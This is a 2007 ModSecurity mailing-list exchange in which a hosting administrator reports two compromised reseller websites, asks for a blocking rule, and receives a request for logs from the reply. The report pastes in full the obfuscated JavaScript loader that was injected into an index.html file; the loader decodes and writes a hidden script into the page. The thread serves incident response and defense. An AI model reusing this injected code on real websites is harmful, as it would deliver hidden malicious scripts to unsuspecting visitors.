[Modsecurity] Some type of file injection vuln going around

Michael Shinn mike at gotroot.com
Tue Oct 9 10:05:17 EDT 2007 

Can you send me that index.html file?  Also, if you can send me your
users access_log, we might be able to find out the vector for the
attack.

On Mon, 2007-10-08 at 12:48 -0400, admin at efastservers.com wrote:
> One of my resellers contacted me today stating that one of his
> websites was hacked and possibly the server. He wanted to know what we
> were going to do about it.
> 
> I checked the server but no other website is affected except for two
> of his own websites.
> 
>  
> 
> There seems to be some type of javascript file injection vuln going
> around. I searched the logs but could not find anything obvious in his
> logs. I checked all sites and they are clean.
> 
>  
> 
> Here is what was injected into his index.html file after the <header>
> tag.
> 
>  
> 
> </html>
> <!--[z0s]--><script>do
> 
> cument.write(unescape("%3Cscript%3Eif%28wA%21%3D1%29%7Bfunction%20Qg%
> 28gx%29%7Breturn%20gx%7Dtry%7Bfunction%20UNc%28IDB%29%7Br
> 
> eturn%20parseInt%28IDB%29%7Dvar%20zmW%3D%
> 27aavalvaLvahvaSvanvagvaIva9vaRvaMvaivaxvaCvadvajvaova7vaVvaJvaOvabvaHvamvawvaevaWvaN
> 
> vakvazva6vaYvatvaXvaPvaUvapvaFva3vaBvayvaqvafvarvaZvacvaDvaTvaGva5vasva4va8vaKvlavllvlLvlhvlSvlnvlgvlIvl9vlRvlMvlivlxvlCvldvlj
> 
> vlovl7vlVvlJvlOvlbvlHvlmvlw%27%3Bvar%20uNq%3DQg%28%27v%27%29%2CHCR%
> 3DArray%2827751%5E27867%2CUNc%28%27243%27%29%2CUNc%28%27227
> 
> %27%29%2CUNc%28%27242%27%29%2CUNc%28%27233%27%29%2C9751%5E9959%2CUNc%
> 28%27244%27%29%2CUNc%28%27190%27%29%2CUNc%28%27230%27%29%
> 
> 2CUNc%28%27245%27%29%2C10675%5E10589%2C936%5E839%2C21887%5E21983%2CUNc
> %28%27210%27%29%2C21801%5E22001%2C21825%5E21993%2C5220%5
> 
> E5301%2CUNc%28%27201%27%29%2C22845%5E22929%2CUNc%28%27202%27%29%
> 2C16044%5E15945%2CUNc%28%27169%27%29%2CUNc%28%27251%27%29%2C10
> 
> 351%5E10393%2CUNc%28%27225%27%29%2CUNc%28%27204%27%29%2C10454%5E10245%
> 2CUNc%28%27189%27%29%2CUNc%28%27247%27%29%2C4863%5E4667%
> 
> 2C29566%5E29637%2CUNc%28%27206%27%29%2CUNc%28%27226%27%29%2C15905%
> 5E16015%2C32317%5E32489%2C618%5E647%2C32760%5E32543%2CUNc%28
> 
> %27171%27%29%2CUNc%28%27184%27%29%2CUNc%28%27182%27%29%2C20297%
> 5E20477%2CUNc%28%27176%27%29%2CUNc%28%27228%27%29%2CUNc%28%2723
> 
> 5%27%29%2CUNc%28%27162%27%29%2CUNc%28%27248%27%29%2CUNc%28%27199%27%
> 29%2CUNc%28%27205%27%29%2CUNc%28%27253%27%29%2CUNc%28%2719
> 
> 5%27%29%2C30514%5E30613%2CUNc%28%27177%27%29%2CUNc%28%27250%27%29%
> 2C15088%5E14857%2CUNc%28%27213%27%29%2CUNc%28%27236%27%29%2C
> 
> UNc%28%27197%27%29%2CUNc%28%27175%27%29%2CUNc%28%27232%27%29%2CUNc%28%
> 27207%27%29%2CUNc%28%27173%27%29%2CUNc%28%27186%27%29%2C
> 
> UNc%28%27161%27%29%2C9002%5E9109%2C2844%5E3015%2C11165%5E11075%
> 2C31322%5E31459%2C7836%5E7745%2CUNc%28%27220%27%29%2CUNc%28%271
> 
> 93%27%29%2C3893%5E3975%2C20421%5E20231%2CUNc%28%27138%27%29%2CUNc%28%
> 27217%27%29%2C24184%5E24243%2CUNc%28%27179%27%29%2CUNc%28
> 
> %27181%27%29%2CUNc%28%27183%27%29%2C6089%5E5987%29%3Bvar%20CVS%2ClXs%
> 3Bvar%20QVT%2CMKq%3D%27aaalaLahaSanagaIa9aRaMaLagaSaiaMax
> 
> aCadajaoa7aVaJaOabaHaxamawahaxaeaWaNaMaOakaxazawagaOajaba6amawahaxaxaYataNaxaMaOakaxazawagaOajaba6axaYataXalaOagaPaSaUaOajaeaW
> 
> aXapaOagaPaSaUaOajabaFa3aBayaqaqaqaqaqaba6axafaiaLaRaUaOaMagaXaLaiaiaraSaOaxaNaxaoa7aFaZaNaZaFaOalaLawanaOajaJaOabaFaZa6aOacan
> 
> aSahaOalaNaZaFaYataXagaiaDaTaPaWagahaSaMapajaba6axaGamawahaxaRa5aNasala4a9a5a8asaVaWaKaNasa4asa6amawahaxadlaaNasaRanafawagaOa4
> 
> aXaLllawalalaSaLagaOllaXaiahapasaVaOlLaNaslhlSagaUlllhasa6aSa9ajafaiaLaRaUaOaMagaXaLaiaiaraSaOaXaSaMafaOaclna9ajaRa5aFasaNasaF
> 
> aWaKabaxaNaNlga4abaHamawahaxaflllSaNafaiaLaRaUaOaMagaXllaiaLawagaSaiaMaXlSaialaga6amawahaxlSaraNaxaslSagasaFasaganlIasaFaslhlh
> 
> asaFajaxaflllSaxl9aNaxasaslRasaslIaWlaajababaxaFaxaflllSaXahaOanllawaLaOaxajlhlMliawlga8aqlglxaXlglClhaVasaXasabaXahaOanllawaL
> 
> aOaxajlhldaXaFlhaVasaXasabaFasaXasaFaWlaajabaxaFasaXasaxaFaxadlaaFaOlLa6amawahaxaDaRaNafaiaLaRaUaOaMagaXaLahaOawagaOlLllaOaUaO
> 
> aMagajasaSa9ahawaUaOasaba6aDaRaXalaOagljagagahaSataRagaOaxajasalahaLasaVaxlSaraba6aDaRaXlSaOaSaplSagaNa4a6aDaRaXakaSafaglSaNlo
> 
> a6aDaRaXa9ahawaUaOl7aiahafaOahaxaNaxaqa6axagahaKaHaxafaiaLaRaUaOaMagaXataiafaKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6axaCadajaR
> 
> a5aVaxaWaKaxaba6aGaxaLawagaLlSajaOabaxaHafaiaLaRaUaOaMagaXakahaSagaOaxajasaalSagaUllaIaaataiafaKaIaalhataiafaKaIaalhlSagaUllaI
> 
> asaba6axafaiaLaRaUaOaMagaXataiafaKaXawananaOaMafa5lSaSllafaxajaxaDaRaba6aCadaxajaxaRa5aVaWaKabaxa6aGaxaGlVa9aRaMaLagaSaiaMaxaW
> 
> laajabaHaxamawahaxlJlOaNloayaVamaoaNaZaqa4lolbaylHaBlma3lxaqawataLafaOa9aZa6amawahaxafazaNaZaZa6axa9aiahajatagaNaqa6axatagaxaa
> 
> axlJlOa6axatagaFaFabaxafazaFaNaxamaoaXalaRatalagahajaTawaglSaXa9llaiaiahajaTawaglSaXahawaMafaiaUajablwamaoaXllaOaMapaglSabaVa4
> 
> aVa4aba6axahaOagaRahaMaxafaza6axaGaalhalaLahaSanagaI%27%3Bvar%20Hui%
> 3DString%28%29%3BzmW%3DzmW.split%28uNq%29%3Bfor%20%28CVS%3
> 
> D0%3BCVS%3CMKq.length%3BCVS+%3D2%29%7BQVT%3DMKq.substr%28CVS%2C2%29%
> 3Bfor%28lXs%3D0%3BlXs%3CzmW.length%3BlXs++%29%7Bif%28zmW%5
> 
> BlXs%5D%3D%3DQVT%29break%3B%7DHui+%3DString.fromCharCode%28HCR%5BlXs%
> 5D%5E128%29%3B%7Ddocument.write%28Hui%29%3B%7Dcatch%28VMj
> 
> %29%7B%7D%7Dvar%20wA%3D1%3C/script%3E"))</script><!--[/z0s]-->
> 
>  
> 
> There is a small discussion about this at
> http://groups.google.com/group/stopbadware/browse_thread/thread/69bac2aaac70e4d5/26405b950d361a23
> 
>  
> 
> Is there a mod_sec rule that can stop this?
> 
>  
> 
> Thanks
> 
> 
> _______________________________________________
> Modsecurity mailing list
> Modsecurity at gotroot.com
> http://lists.gotroot.com/mailman/listinfo/modsecurity
-- 
Michael T. Shinn                                    KeyID:0xDAE2EC86
Key Fingerprint:  1884 E657 A6DF DF1B BFB9 E2C5 DCC6 5297 DAE2 EC86
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xDAE2EC86
SANS Advisory Board Member
  
Got Root?  http://www.gotroot.com
modsecurity rules: http://www.modsecurityrules.com
Troubleshooting Firewalls:  http://troubleshootingfirewalls.com

More information about the Modsecurity mailing list